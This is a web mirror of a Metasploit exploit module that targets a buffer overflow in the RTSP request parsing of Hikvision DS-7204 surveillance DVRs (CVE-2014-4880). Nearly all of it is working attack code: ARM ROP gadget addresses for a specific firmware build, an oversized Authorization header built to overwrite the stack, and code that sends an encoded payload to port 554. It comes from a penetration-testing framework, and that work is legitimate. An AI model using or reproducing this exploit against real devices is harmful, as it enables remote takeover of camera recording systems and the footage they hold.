Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
19513 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in the RTSP request parsing

18
          code of Hikvision DVR appliances. The Hikvision DVR devices record

19
          video feeds of surveillance cameras and offer remote administration

20
          and playback of recorded footage.

21


22
          The vulnerability is present in several models / firmware versions

23
          but due to the available test device this module only supports

24
          the DS-7204 model.

25
        },

26
        'Author' => [

27
          'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          [ 'CVE', '2014-4880' ],

32
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]

33
        ],

34
        'Platform' => 'linux',

35
        'Arch' => ARCH_ARMLE,

36
        'Privileged' => true,

37
        'Targets' => [

38
          #

39
          # ROP targets are difficult to represent in the hash, use callbacks instead

40
          #

41
          [

42
            "DS-7204 Firmware V2.2.10 build 131009", {

43


44
              # The callback handles all target-specific settings

45
              :callback => :target_ds7204_1,

46
              'g_adjustesp' => 0x002c828c,

47
              # ADD             SP, SP, #0x350

48
              # LDMFD           SP!, {R4-R6,PC}

49


50
              'g_r3fromsp' => 0x00446f80,

51
              # ADD             R3, SP, #0x60+var_58

52
              # BLX             R6

53


54
              'g_blxr3_pop' => 0x00456360,

55
              # BLX             R3

56
              # LDMFD           SP!, {R1-R7,PC}

57


58
              'g_popr3' => 0x0000fe98,

59
              # LDMFD           SP!, {R3,PC}

60
            }

61
          ],

62


63
          [

64
            "Debug Target", {

65


66
              # The callback handles all target-specific settings

67
              :callback => :target_debug

68


69
            }

70
          ]

71


72
        ],

73
        'DefaultTarget' => 0,

74
        'DisclosureDate' => '2014-11-19',

75
        'Notes' => {

76
          'Reliability' => UNKNOWN_RELIABILITY,

77
          'Stability' => UNKNOWN_STABILITY,

78
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

79
        }

80
      )

81
    )

82


83
    register_options(

84
      [

85
        Opt::RPORT(554)

86
      ]

87
    )

88
  end

89


90
  def exploit

91
    unless self.respond_to?(target[:callback], true)

92
      fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")

93
    end

94


95
    device_rop = self.send(target[:callback])

96


97
    request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"

98
    request << "CSeq: 7\r\n"

99
    request << "Authorization: Basic "

100
    request << rand_text_alpha(0x280 + 34)

101
    request << [target["g_adjustesp"]].pack("V")[0..2]

102
    request << "\r\n\r\n"

103
    request << rand_text_alpha(19)

104


105
    # now append the ropchain

106
    request << device_rop

107
    request << rand_text_alpha(8)

108
    request << payload.encoded

109


110
    connect

111
    sock.put(request)

112
    disconnect

113
  end

114


115
  # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc

116
  def target_ds7204_1

117
    # Create a fixed-size buffer for the rop chain

118
    ropbuf = rand_text_alpha(24)

119


120
    # CHAIN = [

121
    #   0, #R4 pop adjustsp

122
    #   0, #R5 pop adjustsp

123
    #   GADGET_BLXR3_POP, #R6 pop adjustsp

124
    #   GADGET_POPR3,

125
    #   0, #R3 pop

126
    #   GADGET_R3FROMSP,

127
    # ]

128


129
    ropbuf[8, 4] = [target["g_blxr3_pop"]].pack("V")

130
    ropbuf[12, 4] = [target["g_popr3"]].pack("V")

131
    ropbuf[20, 4] = [target["g_r3fromsp"]].pack("V")

132


133
    return ropbuf

134
  end

135


136
  # Generate a buffer that provides a starting point for exploit development

137
  def target_debug

138
    Rex::Text.pattern_create(2000)

139
  end

140


141
  def rhost

142
    datastore['RHOST']

143
  end

144


145
  def rport

146
    datastore['RPORT']

147
  end

148
end

149


150